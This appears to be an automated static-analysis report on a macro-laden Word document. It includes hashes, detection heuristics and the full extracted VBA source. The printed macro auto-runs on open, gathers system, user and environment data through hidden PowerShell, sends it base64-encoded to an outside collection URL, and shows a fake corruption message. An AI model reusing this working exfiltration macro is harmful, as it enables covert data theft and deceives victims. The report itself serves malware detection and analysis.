Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0e7798a4231352e5…

MALICIOUS

Office (OOXML)

23.2 KB Created: 2017-10-31 14:05:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24
MD5: 683010899d33bb9e7bdfe88f1b24b345 SHA-1: 5151cc1443a5b1d2d8ccd4ce33101437dd3519e0 SHA-256: 0e7798a4231352e5427c8ce6935a6217e5413ff27a295c71d375c3712f4d8b7e
374 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell and the Shell() function to execute PowerShell commands. These commands are likely used to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Downloader.Pwshell-10001336-0'. The presence of AutoOpen, Document_Open, and other auto-execution macros suggests an attempt to immediately run the malicious code upon opening the document.

Heuristics 11

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        tmpOutFile = createTempFile()
        Set wsh = CreateObject("WScript.Shell")
        pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        ''' -------------------------------
        ''' myCmd = "<powershell command>"
        ''' output = RunPowershellCmd(myCmd)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set HttpReq = CreateObject("MSXML2.XMLHTTP")
        ' change path to collection script here
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Public Sub AutoOpen()
        submit_mode = "auto"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        submit_mode = "auto"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Public Sub Auto_Open()
        submit_mode = "auto"
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        hostname = Environ("computername")
        username = Environ("username")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://osiris.compass-security.com/phishing/collect.php In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7512 bytes
SHA-256: 2607e42f2688633da9e595049c9c54f519b77310abcf09a69ab8b51775c1d528
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
' TODO
' Change the hardcoded fileID in the Exploit() function
' Adjust the executed PS commands in the Exploit() function as necessary
' Adjust the URL of the collection script in the Request() function
' Adjust the language of the displayed messages

Public submit_mode As String
Public runID As String
Public fileID As String

Private Sub CommandButton1_Click()
    submit_mode = "click"
    Call Exploit
End Sub

Public Sub Document_Open()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub Auto_Open()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub AutoOpen()
    submit_mode = "auto"
    Call Exploit
End Sub

Public Sub AutoExec()
    submit_mode = "auto"
    Call Exploit
End Sub

Function Exploit()
    ' executed attacks are defined here. add more commands using the template below
    ''' template for PS command
    ''' -------------------------------
    ''' myCmd = "<powershell command>"
    ''' output = RunPowershellCmd(myCmd)
    ''' Call Request(output, "<label>")
    ''' -------------------------------
    On Error GoTo Err2:
    Dim myCmd As String
    Dim output As String
        
    ' generate a random ID to identify connected requests
    runID = RandomString(32)
    ' hardcoded ID to identify source document of requests
    fileID = "contentfiltercheck"
    
    ' Basic information gathering without PowerShell
    Call Request(BasicInfo(), "BasicInfo")
    
    ' Get ip configuration with PS
    myCmd = "Get-NetIPConfiguration"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "ipconfig")
    
    ' Get environment variables with PS
    myCmd = "Get-ChildItem Env:"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "env_vars")
    
    ' Get local user accounts with PS
    myCmd = "Get-WmiObject -Class Win32_UserAccount -Filter  'LocalAccount=True' | Select PSComputername, Name, Status, Disabled, AccountType, Lockout, PasswordRequired, PasswordChangeable, SID "
    output = RunPowershellCmd(myCmd)
    Call Request(output, "local_users")
    
    ' Get connected volumes/shares with PS
    myCmd = "Get-WmiObject -class win32_logicaldisk"
    output = RunPowershellCmd(myCmd)
    Call Request(output, "local_volumes")
    
    ' Show corruption message and close document
    MsgBox "The document is corrupted and cannot be opened.", vbOKOnly
    ActiveDocument.Close SaveChanges:=wdDoNotSaveChanges
    Exit Function

Err2:
     MsgBox "An unknown error  occurred.", vbCritical, "Unknown error"
       
End Function


Function Request(data As String, Optional label As String = "n/a")
    Dim outBytes() As Byte
    Dim encOutput As String
    
    On Error GoTo Err1:
    
    ' base64 encode data to be transmitted
    outBytes = data
    encOutput = Replace(EncodeBase64(outBytes), Chr(10), "")
    
    Dim HttpReq As Object
  
    Set HttpReq = CreateObject("MSXML2.XMLHTTP")
    ' change path to collection script here
    HttpReq.Open "POST", "http://osiris.compass-security.com/phishing/collect.php", False
    HttpReq.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    HttpReq.send "fileID=" & fileID & "&runID=" & runID & "&data=" & label & ":" & encOutput & "&mode=" & submit_mode
    RequestWin = HttpReq.responseText
    Exit Function
    
Err1:
    MsgBox "An unknown error  occurred.", vbCritical, "Unknown error"
    
End Function

Public Function createTempFile() As String
    ' create a temporary file to store command output
    Dim tmpFolder, tmpName, tmpFile, fso
    
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set tmpFolder = fso.GetSpecialFolder(2)
    tmpName = fso.GetTempName
    Set tmpFile = tmpFolder.CreateTextFile(tmpName)
    tmpFile.Close
    createTempFile = tmpFolder & "\" & tmpName
End Function

Public Function getOutput(ByVal tmpOutFile As String) As String
    ' retrieve command output from temporary file
    Dim tmpFile, fso

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set tmpFile = fso.OpenTextFile(tmpOutFile, 1, False, -1)
    getOutput = tmpFile.readall
    tmpFile.Close
    
End Function

Public Function BasicInfo() As String
    ' collect basic information without PS, should work on all systems
    Dim hostname As String
    Dim username As String
    
    hostname = Environ("computername")
    username = Environ("username")
    BasicInfo = "pc:" & hostname & ";user:" & username

    BasicInfo = CStr(StrConv(CStr(BasicInfo), vbFromUnicode))
    
End Function

Public Function RunPowershellCmd(myCmd As String) As String
    ' execute given powershell command, store output in a temporary file and return output from there
    Dim wsh As Object
    Dim ret
    Dim strOutput, tmpOutFile, pscmd As String
    
    tmpOutFile = createTempFile()
    Set wsh = CreateObject("WScript.Shell")
    pscmd = "PowerShell " & Chr(34) & myCmd & " | out-file -encoding utf8 " & tmpOutFile & Chr(34)
    ret = wsh.Run(pscmd, 0, True)
    strOutput = getOutput(tmpOutFile)
     RunPowershellCmd = strOutput
End Function

Public Function BASE64SHA1(ByVal sTextToHash As String)
    ' base64 encode data and then hash it with sha1
    Dim asc As Object
    Dim enc As Object
    Dim TextToHash() As Byte
    Dim SharedSecretKey() As Byte
    Dim bytes() As Byte
    Const cutoff As Integer = 5

    Set asc = CreateObject("System.Text.UTF8Encoding")
    Set enc = CreateObject("System.Security.Cryptography.HMACSHA1")

    TextToHash = asc.GetBytes_4(sTextToHash)
    SharedSecretKey = asc.GetBytes_4(sTextToHash)
    enc.Key = SharedSecretKey

    bytes = enc.ComputeHash_2((TextToHash))
    BASE64SHA1 = EncodeBase64(bytes)
    'BASE64SHA1 = Left(BASE64SHA1, cutoff)

    Set asc = Nothing
    Set enc = Nothing

End Function

Public Function EncodeBase64(ByRef arrData() As Byte) As String
    ' base64 encode data
    Dim objXML As Object
    Dim objNode As Object

    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")

    objNode.DataType = "bin.base64"
    objNode.nodeTypedValue = arrData
    EncodeBase64 = objNode.Text

    Set objNode = Nothing
    Set objXML = Nothing

End Function

Public Function decodeBase64(ByVal strData As String) As Byte()
    ' base64 decode data
    Dim objXML As Object
    Dim objNode As Object
    
    Set objXML = CreateObject("MSXML2.DOMDocument")
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    decodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Public Function RandomString(l As Integer) As String
    ' generate a random string (lowercase/uppercase/digits) of length l
    Randomize
    Dim rndStr As String
    rndStr = "abcdefghijklmnopqrstuvwxyz"
    rndStr = rndStr & UCase(rndStr) & "0123456789"

    Dim i As Long
    For i = 1 To l
        RandomString = RandomString & Mid$(rndStr, Int(Rnd() * Len(rndStr) + 1), 1)
    Next

End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 25600 bytes
SHA-256: e56050cb4c2a39ee98cce0325bf94f117f45d93553ce7ee11a31724da864fa03
Detection
ClamAV: Doc.Downloader.Pwshell-10001336-0
Obfuscation or payload: unlikely